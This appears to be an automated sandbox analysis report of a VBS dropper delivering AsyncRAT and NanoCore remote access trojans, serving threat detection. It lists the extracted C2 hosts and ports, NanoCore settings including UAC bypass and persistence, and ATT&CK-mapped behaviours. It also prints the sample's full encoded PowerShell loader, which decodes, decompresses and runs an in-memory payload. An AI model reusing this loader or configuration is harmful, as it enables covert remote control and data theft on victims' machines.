asyncrat | c4b066fb890720e472c5620375ee0d24dddfb222a5c8384c8613e486ec38cbbd

Resubmissions

28-08-2024 22:22

240828-2al3mazana 10

28-08-2024 21:59

28-08-2024 21:42

28-08-2024 00:57

28-08-2024 00:53

27-08-2024 03:06

Analysis

max time kernel
147s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
28-08-2024 21:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c4b066fb890720e472c5620375ee0d24dddfb222a5c8384c8613e486ec38cbbd.vbs
Size

2.0MB
MD5

3096f8476512077adacad2e66cd9535e
SHA1

8ddfbf4ea1bb26fecb75ff9482529060351f5c82
SHA256

c4b066fb890720e472c5620375ee0d24dddfb222a5c8384c8613e486ec38cbbd
SHA512

277c34f5300e6e4b2129dd8aae4e68c226dee549601d0fb12323d86588492ea810cbe9ffcecda66c7680f2af6e76a7d7532d7a09d1cd59d639980ae06ac5188f
SSDEEP

24576:9f5HNlz6GydnATwu6JRnDB/4G8jslVZCNct1hMYnnEhKEw7nmlLW+r1/YrK88skH:pNTmJT/QglCN07ir4f6MJk8nO

Score

10^/10

asyncrat nanocore default discovery keylogger persistence rat spyware stealer trojan

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

onlineisofilelandersbaseballer1.mrbonus.com:7011

Mutex

AsyncMutex_6SI8OkPnk

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

nanocore

Version

1.2.2.0

e-businessloader.mywire.org:5230

127.0.0.1:5230

Mutex

0be0e5d9-4209-4f88-b4fe-27e7b678a0b5

Attributes

activate_away_mode
true
backup_connection_host
127.0.0.1
backup_dns_server
8.8.4.4
buffer_size
65535
build_time
2024-03-16T21:32:38.702958636Z
bypass_user_account_control
true
bypass_user_account_control_data
clear_access_control
true
clear_zone_identifier
false
connect_delay
4000
connection_port
5230
default_group
e-business
enable_debug_mode
true
gc_threshold
1.048576e+07
keep_alive_timeout
30000
keyboard_logging
false
lan_timeout
2500
max_packet_size
1.048576e+07
mutex
0be0e5d9-4209-4f88-b4fe-27e7b678a0b5
mutex_timeout
5000
prevent_system_sleep
false
primary_connection_host
e-businessloader.mywire.org
primary_dns_server
8.8.8.8
request_elevation
true
restart_delay
5000
run_delay
0
run_on_startup
true
set_critical_process
true
timeout_interval
5000
use_custom_dns_server
false
version
1.2.2.0
wan_timeout
8000

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
NanoCore
NanoCore is a remote access tool (RAT) with a variety of capabilities.
keylogger trojan stealer spyware nanocore

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	820	3664	cmd.exe	84

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 848 created 3440	848	c4b066fb890720e472c5620375ee0d24dddfb222a5c8384c8613e486ec38cbbd.vbs.exe	56

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral2/files/0x000700000002348e-1116.dat	family_asyncrat

Downloads MZ/PE file

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	c4b066fb890720e472c5620375ee0d24dddfb222a5c8384c8613e486ec38cbbd.vbs.exe

Executes dropped EXE 2 IoCs

pid	Process
848	c4b066fb890720e472c5620375ee0d24dddfb222a5c8384c8613e486ec38cbbd.vbs.exe
3056	AsyncRATonlineisofilelandersbaseballer1.mrbonus.com7011exe.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Ruevjirwl = "C:\\Users\\Admin\\AppData\\Roaming\\Ruevjirwl.vbs"	c4b066fb890720e472c5620375ee0d24dddfb222a5c8384c8613e486ec38cbbd.vbs.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
186	raw.githubusercontent.com
187	raw.githubusercontent.com

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 848 set thread context of 1484	848	c4b066fb890720e472c5620375ee0d24dddfb222a5c8384c8613e486ec38cbbd.vbs.exe	100

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	c4b066fb890720e472c5620375ee0d24dddfb222a5c8384c8613e486ec38cbbd.vbs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AsyncRATonlineisofilelandersbaseballer1.mrbonus.com7011exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	InstallUtil.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	WScript.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-656926755-4116854191-210765258-1000\{E388EE16-4123-4412-B95D-B9B9C73A4861}	msedge.exe

Suspicious behavior: EnumeratesProcesses 26 IoCs

pid	Process
848	c4b066fb890720e472c5620375ee0d24dddfb222a5c8384c8613e486ec38cbbd.vbs.exe
848	c4b066fb890720e472c5620375ee0d24dddfb222a5c8384c8613e486ec38cbbd.vbs.exe
848	c4b066fb890720e472c5620375ee0d24dddfb222a5c8384c8613e486ec38cbbd.vbs.exe
1484	InstallUtil.exe
1484	InstallUtil.exe
1484	InstallUtil.exe
1484	InstallUtil.exe
4624	msedge.exe
4624	msedge.exe
2516	msedge.exe
2516	msedge.exe
1484	InstallUtil.exe
1484	InstallUtil.exe
1484	InstallUtil.exe
1484	InstallUtil.exe
1484	InstallUtil.exe
1484	InstallUtil.exe
1484	InstallUtil.exe
1944	identity_helper.exe
1944	identity_helper.exe
5472	msedge.exe
5472	msedge.exe
3612	msedge.exe
3612	msedge.exe
3612	msedge.exe
3612	msedge.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1484	InstallUtil.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 19 IoCs

pid	Process
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	848	c4b066fb890720e472c5620375ee0d24dddfb222a5c8384c8613e486ec38cbbd.vbs.exe
Token: SeDebugPrivilege	848	c4b066fb890720e472c5620375ee0d24dddfb222a5c8384c8613e486ec38cbbd.vbs.exe
Token: SeDebugPrivilege	1484	InstallUtil.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe
2516	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1088 wrote to memory of 848	1088	WScript.exe	90
PID 1088 wrote to memory of 848	1088	WScript.exe	90
PID 1088 wrote to memory of 848	1088	WScript.exe	90
PID 848 wrote to memory of 3056	848	c4b066fb890720e472c5620375ee0d24dddfb222a5c8384c8613e486ec38cbbd.vbs.exe	99
PID 848 wrote to memory of 3056	848	c4b066fb890720e472c5620375ee0d24dddfb222a5c8384c8613e486ec38cbbd.vbs.exe	99
PID 848 wrote to memory of 3056	848	c4b066fb890720e472c5620375ee0d24dddfb222a5c8384c8613e486ec38cbbd.vbs.exe	99
PID 848 wrote to memory of 1484	848	c4b066fb890720e472c5620375ee0d24dddfb222a5c8384c8613e486ec38cbbd.vbs.exe	100
PID 848 wrote to memory of 1484	848	c4b066fb890720e472c5620375ee0d24dddfb222a5c8384c8613e486ec38cbbd.vbs.exe	100
PID 848 wrote to memory of 1484	848	c4b066fb890720e472c5620375ee0d24dddfb222a5c8384c8613e486ec38cbbd.vbs.exe	100
PID 848 wrote to memory of 1484	848	c4b066fb890720e472c5620375ee0d24dddfb222a5c8384c8613e486ec38cbbd.vbs.exe	100
PID 848 wrote to memory of 1484	848	c4b066fb890720e472c5620375ee0d24dddfb222a5c8384c8613e486ec38cbbd.vbs.exe	100
PID 848 wrote to memory of 1484	848	c4b066fb890720e472c5620375ee0d24dddfb222a5c8384c8613e486ec38cbbd.vbs.exe	100
PID 848 wrote to memory of 1484	848	c4b066fb890720e472c5620375ee0d24dddfb222a5c8384c8613e486ec38cbbd.vbs.exe	100
PID 848 wrote to memory of 1484	848	c4b066fb890720e472c5620375ee0d24dddfb222a5c8384c8613e486ec38cbbd.vbs.exe	100
PID 2516 wrote to memory of 1100	2516	msedge.exe	103
PID 2516 wrote to memory of 1100	2516	msedge.exe	103
PID 2516 wrote to memory of 2500	2516	msedge.exe	104
PID 2516 wrote to memory of 2500	2516	msedge.exe	104
PID 2516 wrote to memory of 2500	2516	msedge.exe	104
PID 2516 wrote to memory of 2500	2516	msedge.exe	104
PID 2516 wrote to memory of 2500	2516	msedge.exe	104
PID 2516 wrote to memory of 2500	2516	msedge.exe	104
PID 2516 wrote to memory of 2500	2516	msedge.exe	104
PID 2516 wrote to memory of 2500	2516	msedge.exe	104
PID 2516 wrote to memory of 2500	2516	msedge.exe	104
PID 2516 wrote to memory of 2500	2516	msedge.exe	104
PID 2516 wrote to memory of 2500	2516	msedge.exe	104
PID 2516 wrote to memory of 2500	2516	msedge.exe	104
PID 2516 wrote to memory of 2500	2516	msedge.exe	104
PID 2516 wrote to memory of 2500	2516	msedge.exe	104
PID 2516 wrote to memory of 2500	2516	msedge.exe	104
PID 2516 wrote to memory of 2500	2516	msedge.exe	104
PID 2516 wrote to memory of 2500	2516	msedge.exe	104
PID 2516 wrote to memory of 2500	2516	msedge.exe	104
PID 2516 wrote to memory of 2500	2516	msedge.exe	104
PID 2516 wrote to memory of 2500	2516	msedge.exe	104
PID 2516 wrote to memory of 2500	2516	msedge.exe	104
PID 2516 wrote to memory of 2500	2516	msedge.exe	104
PID 2516 wrote to memory of 2500	2516	msedge.exe	104
PID 2516 wrote to memory of 2500	2516	msedge.exe	104
PID 2516 wrote to memory of 2500	2516	msedge.exe	104
PID 2516 wrote to memory of 2500	2516	msedge.exe	104
PID 2516 wrote to memory of 2500	2516	msedge.exe	104
PID 2516 wrote to memory of 2500	2516	msedge.exe	104
PID 2516 wrote to memory of 2500	2516	msedge.exe	104
PID 2516 wrote to memory of 2500	2516	msedge.exe	104
PID 2516 wrote to memory of 2500	2516	msedge.exe	104
PID 2516 wrote to memory of 2500	2516	msedge.exe	104
PID 2516 wrote to memory of 2500	2516	msedge.exe	104
PID 2516 wrote to memory of 2500	2516	msedge.exe	104
PID 2516 wrote to memory of 2500	2516	msedge.exe	104
PID 2516 wrote to memory of 2500	2516	msedge.exe	104
PID 2516 wrote to memory of 2500	2516	msedge.exe	104
PID 2516 wrote to memory of 2500	2516	msedge.exe	104
PID 2516 wrote to memory of 2500	2516	msedge.exe	104
PID 2516 wrote to memory of 2500	2516	msedge.exe	104
PID 2516 wrote to memory of 4624	2516	msedge.exe	105
PID 2516 wrote to memory of 4624	2516	msedge.exe	105
PID 2516 wrote to memory of 868	2516	msedge.exe	106
PID 2516 wrote to memory of 868	2516	msedge.exe	106
PID 2516 wrote to memory of 868	2516	msedge.exe	106
PID 2516 wrote to memory of 868	2516	msedge.exe	106
PID 2516 wrote to memory of 868	2516	msedge.exe	106
PID 2516 wrote to memory of 868	2516	msedge.exe	106

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3440
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c4b066fb890720e472c5620375ee0d24dddfb222a5c8384c8613e486ec38cbbd.vbs"
  2⤵
  - Checks computer location settings
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:1088
- - C:\Users\Admin\AppData\Local\Temp\c4b066fb890720e472c5620375ee0d24dddfb222a5c8384c8613e486ec38cbbd.vbs.exe
    "C:\Users\Admin\AppData\Local\Temp\c4b066fb890720e472c5620375ee0d24dddfb222a5c8384c8613e486ec38cbbd.vbs.exe" -enc JABWAGwAbgBmAHIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQAWQBiAGsAbwBhACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQAVgBsAG4AZgByACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAEYAZABqAGcAagAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABZAGIAawBvAGEALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAEEAcABnAGoAcABqAGoAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAEYAZABqAGcAagAgACkAOwAkAFcAdQB3AHUAaAB1AGMAaAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQAWQBnAG8AeQBpAHYAZQBuAG4AbwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABBAHAAZwBqAHAAagBqACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABZAGcAbwB5AGkAdgBlAG4AbgBvAC4AQwBvAHAAeQBUAG8AKAAgACQAVwB1AHcAdQBoAHUAYwBoACAAKQA7ACQAWQBnAG8AeQBpAHYAZQBuAG4AbwAuAEMAbABvAHMAZQAoACkAOwAkAEEAcABnAGoAcABqAGoALgBDAGwAbwBzAGUAKAApADsAWwBiAHkAdABlAFsAXQBdACAAJABGAGQAagBnAGoAIAA9ACAAJABXAHUAdwB1AGgAdQBjAGgALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAEYAZABqAGcAagApADsAIAAkAEMAaQB4AHoAbwBmACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQARgBkAGoAZwBqACkAOwAgACQATABqAGoAdwBlAHIAZgBuAGcAIAA9ACAAJABDAGkAeAB6AG8AZgAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAEwAagBqAHcAZQByAGYAbgBnAC4ARABlAGMAbABhAHIAaQBuAGcAVAB5AHAAZQAsACAAJABMAGoAagB3AGUAcgBmAG4AZwAuAE4AYQBtAGUAKQAuAEQAeQBuAGEAbQBpAGMASQBuAHYAbwBrAGUAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Checks computer location settings
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:848
  - - C:\Users\Admin\AppData\Local\Temp\AsyncRATonlineisofilelandersbaseballer1.mrbonus.com7011exe.exe
      "C:\Users\Admin\AppData\Local\Temp\AsyncRATonlineisofilelandersbaseballer1.mrbonus.com7011exe.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:3056
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  PID:1484
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:2516
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffaceaf46f8,0x7ffaceaf4708,0x7ffaceaf4718
    3⤵
    PID:1100
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,10765711910306665475,14465962944898833779,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2204 /prefetch:2
    3⤵
    PID:2500
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,10765711910306665475,14465962944898833779,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4624
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2148,10765711910306665475,14465962944898833779,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2644 /prefetch:8
    3⤵
    PID:868
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,10765711910306665475,14465962944898833779,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1
    3⤵
    PID:2792
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,10765711910306665475,14465962944898833779,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1
    3⤵
    PID:2796
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,10765711910306665475,14465962944898833779,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5048 /prefetch:1
    3⤵
    PID:3736
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,10765711910306665475,14465962944898833779,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5156 /prefetch:1
    3⤵
    PID:5084
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,10765711910306665475,14465962944898833779,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5340 /prefetch:8
    3⤵
    PID:5024
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,10765711910306665475,14465962944898833779,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5340 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1944
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,10765711910306665475,14465962944898833779,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5384 /prefetch:1
    3⤵
    PID:4076
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,10765711910306665475,14465962944898833779,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5156 /prefetch:1
    3⤵
    PID:644
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,10765711910306665475,14465962944898833779,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4356 /prefetch:1
    3⤵
    PID:2716
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,10765711910306665475,14465962944898833779,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5596 /prefetch:1
    3⤵
    PID:4736
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2148,10765711910306665475,14465962944898833779,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5376 /prefetch:8
    3⤵
    PID:5464
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2148,10765711910306665475,14465962944898833779,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=3700 /prefetch:8
    3⤵
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    PID:5472
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,10765711910306665475,14465962944898833779,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4496 /prefetch:1
    3⤵
    PID:5852
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,10765711910306665475,14465962944898833779,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4220 /prefetch:1
    3⤵
    PID:1808
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,10765711910306665475,14465962944898833779,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3784 /prefetch:1
    3⤵
    PID:1540
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,10765711910306665475,14465962944898833779,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5540 /prefetch:1
    3⤵
